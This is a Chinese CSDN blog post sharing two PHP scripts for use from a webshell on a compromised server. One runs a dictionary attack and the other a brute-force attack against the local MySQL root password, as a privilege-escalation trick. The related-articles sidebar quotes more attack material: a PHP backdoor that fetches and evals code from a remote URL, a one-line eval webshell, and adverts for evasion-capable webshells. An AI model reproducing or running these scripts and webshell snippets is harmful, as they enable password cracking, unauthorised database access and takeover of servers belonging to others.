webshell另类提权新姿势-php本地猜解MYSQL

最新推荐文章于 2020-12-05 08:07:18 发布
最新推荐文章于 2020-12-05 08:07:18 发布
阅读量978 收藏
点赞数
分类专栏: 个人笔记 文章标签: php mysql 破解 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/byb123/article/details/51179319
版权

代码笔记
php本地猜解MYSQL-字典文件猜解

<?
set_time_limit(0); //脚本不超时
$user=”root”; //用户名
//$passwd=file(“password.txt”); //密码字典
//for($i=0;$i<count($passwd);$i++){
//$pass=$passwd[$i];
connect($user,$pass);
flush();
//}
echo “扫描结束!”;
function connect($user,$pass) {
$conn=@mysql_connect(“localhost”,$user,$pass);
if($conn){
echo “<font color=’#0000FF’><b>得到密码:<font color=’#FF0000′>”.$pass.”</font>!!!</b></font>”;
exit();
}
else {
echo $pass.’
‘;
}
}

?>

php本地猜解MYSQL-暴力猜解

<textarea rows=25 cols=90 id=’t1′>
<?php
set_time_limit(0);
$fruit=array
(‘a’,’b’,’c’,’d’,’e’,’f’,’g’,’h’,’i’,’j’,’k’,’l’,’m’,’n’,’o’,’p’,’q’,’r
‘,’s’,’t’,’u’,’v’,’w’,’x’,’y’,’z’); //密码组合单个字符
$mmcd=3;  //密码长度
$jlcs1=0;
$dishes[]=range(1,$mmcd);
//开始循环
for($i=0;$i<$mmcd;$i++){
foreach($dishes as $k=>$v){
foreach($fruit as $_fruit){
$v[$i]=$_fruit;
$dishes[]=$v;
unset($dishes[$k]);
$t=implode(”,$v);
$user='root';
$pass=$t;
$conn=@mysql_connect(‘localhost’,$user,$pass);

//每生成800个密码自动删除文本框并创建一个文本框
$jlcs1=$jlcs1+1;
if($jlcs1==800){
echo “</textarea>”;
echo “<script language=\”JavaScript\”>
var v = document.getElementById(‘t1′);
v.parentNode.removeChild(v);
</script>”;
echo “<textarea rows=25 cols=90 id=’t1′>”;
$jlcs1=0;
}

//测试密码
if($conn){
echo “<script language=\”JavaScript\”>
var v = document.getElementById(‘t1′);
v.parentNode.removeChild(v);
</script>”;
echo “</textarea>”;
echo “<font color=’#0000FF’><b>得到密码: <font
color=’#FF0000′>”.$pass.”</font>! ! ! </b></font>”;
exit();
}
else {
echo $pass.’ ‘;
}
flush();
}

}
//总循环输出
echo “</textarea>”;
echo “<script language=\”JavaScript\”>
var v = document.getElementById(‘t1′);
v.parentNode.removeChild(v);
</script>”;
echo “<textarea rows=25 cols=90 id=’t1′>”;
echo ‘扫描’,$i+1,'!';
}

?>

博客的文章都会发到个人订阅号上,欢迎关注
这里写图片描述

王三三
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php webshell提权_[投稿]Webshell 远程提权
weixin_31955599的博客
03-09 865
虽然现在Ubuntu已经出到14.04 LTS,但是国外的攻击思路一直比我大天朝先进2、3年,这篇文章所演示的漏洞到现在仍是有借鉴意义的。Ubuntu 是基于Debian GNU/Linux,所以大便….咳咳…..Debian系的Linux发行版本或多或少都会有以下的漏洞,所以攻击思路适用与大部分的发行版。话不多说,将接下去就让我们进入紧张刺激的攻防实战吧!———| 关于漏洞 |———Debi...
php提权,一次实战提权
weixin_39996096的博客
03-10 1171
原标题:一次实战提权闲来没事,朋友发给我一个站,需要提权,然后那就试试吧,于是就有了接下来的文章,大牛勿喷https://xxxxxx/……/Abstract.aspx(地址不方便公布)猜测:已经上了一个aspx的大马,看来支持aspx那就可能有mssql环境,可能开放了1433,待会可以利用sa提权等等有关mssql的提权方法: 然后打开访问看看: 熟悉的界面,那我们先来搜集一下基本信息: 从这...
Linux下WEBSHELL提权
fengling132的专栏
03-30 2334
phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。 前提:1、目标机上安装了GCC能编译源码                  2、Kernel 2.6.x         (>= 2.6.13 && 因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把
webshell提权
free_xiaochen的博客
09-11 8639
提权 提权前奏 提权:主要是针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得服务器权限 通常所处的权限:  ASP/PHP 匿名权限 ASPX USER权限 JSP 通常是系统权限 收集信息:  内外网 服务器系统和版本位数 服务器的补丁情况 服务器的安装软件情况 服务器的防护软件情况 端口情况 支持脚本情况 。。...
php免杀大马
07-12
常用的php大马,可提权反弹。 常用提权大马常用的php大马,可提权反弹。 常用提权大马
PHPwebshell提权源码
08-07
PHPwebshell提权源码 集合控制台 网路 链接 账户 打包 修改文件
webshell提权教程.doc
01-08
webshell提权教程
CVE-2018-8120-Webshell下可用版本提权
07-16
Microsoft Windows中存在提权漏洞,该漏洞源于Win32k组件没有正确的处理内存中的对象。攻击者可利用该漏洞在内核模式下以提升的权限执行任意代码。 2 漏洞标识符 CVE ID: CVE-2018-8120 3 影响系统 受影响系统:...
webshell另类提权技巧
05-01
webshell另类提权技巧 webshell另类提权技巧
另类webshell提权1
最新发布
08-08
在网络安全领域,提权是一种常见的攻击手段,目的是获取更高的系统权限。本文主要讨论了一种针对Web服务器的非典型提权方法,特别是在一个已经存在SQL Server 1433端口开放,并且拥有SA账户密码的情况下进行的操作。...
2018最免杀大马
12-20
1.界面简洁 功能如下: 文件管理 批量挂马 批量清马 批量替换 扫描木马 系统信息 执行命令 组件接口 扫描端口 搜索文件 ServU提权 MYSQL提权 MYSQL执行 MYSQL管理 多数据库操作 NC反弹 Ftp_Brute Ftp连接 PHP反弹 Linux反弹 执行PHP代码 弱口令探测 注册表操作 HTTP在线代理 HTTP下载 DDOS攻击 进程
mysql提权_【原创】MySQL常见提权姿势总结
weixin_39686192的博客
12-05 1079
最近在复习mysql提权,所以正好写篇文章总结一下关于mysql的常见提权姿势相关操作select @@version; 查询数据库版本 select @@basedir; 查询MYSQL安装路径 select @@plugin_dir ; 查看plugin路径 select host, user, password from mysql.user; 查询hash (MySQL <= 5.6...
mysql提权_网站入侵渗透测试之各种Windows提权思路讲解(八种最方法)
weixin_39649490的博客
12-05 319
学习技术只为更好的保障自身 公司安全,切勿违规操作,有什么不懂的技术问题可以私聊~方法一:winPEAS寻找可提权的地方仓库地址:https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite也可以用lazagne来收集密码,如果找到一个RDP可连接密码,可以用以下ps1来运行执行命令$secpasswd = Co...
PHPwind后台获取Webshell
Flashlm专栏
08-01 3561
发现的一个phpwind漏洞搞的热闹非凡,该漏洞是因为message.php 文件的几个变量未进行过滤造成的。官方已发布补丁,所以我在这里摘一点关于取得管理密码后怎么拿webshell的方法:方式1 模板法 进入后台, 风格模版设置 ,在随便一行写代码记住,这代码必须顶着左边行写,代码前面不可以有任何字符。EOT;eval($a);print 例如,我写完某一行为。.headurl { color
一句话***(webshell)是如何执行命令的
weixin_34381687的博客
06-16 1882
      在很多的***过程中,***人员会上传一句话***(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话***到底是如何执行的呢,下面我们就对webshell进行一个简单的分析。首先我们先看一个原始而又简单的php一句话***。&lt;?php @eval($_POST['cmd']); ?&gt;看到这里不得不赞美前...
利用mysql的几种提权方式
热门推荐
一个安全研究员
08-06 2万+
如题
捡了一个非常淫荡的PHP后门,给跪了
weixin_30606461的博客
01-23 2851
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep...
php免杀教程【绝对原创】
dfdhxb995397的博客
08-01 2834
这个绝对原创! + 首发!个人认为免杀大致分为这几个方面:1.关键字拆分。 比如assert,可以写成 'a'.'ss'.'e'.'r'.'t'这样。2.可变变量、引用、可变函数。 可变变量比如$a=$_POST['x'];$b='a';@eval($$b); 引用比如$a=$_POST['x'];$b=&$a;@eval($b...
php一句话获取webshell代码
a843538946的专栏
12-14 3385
&lt;?php @eval($_POST['chopper']);?&gt;

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值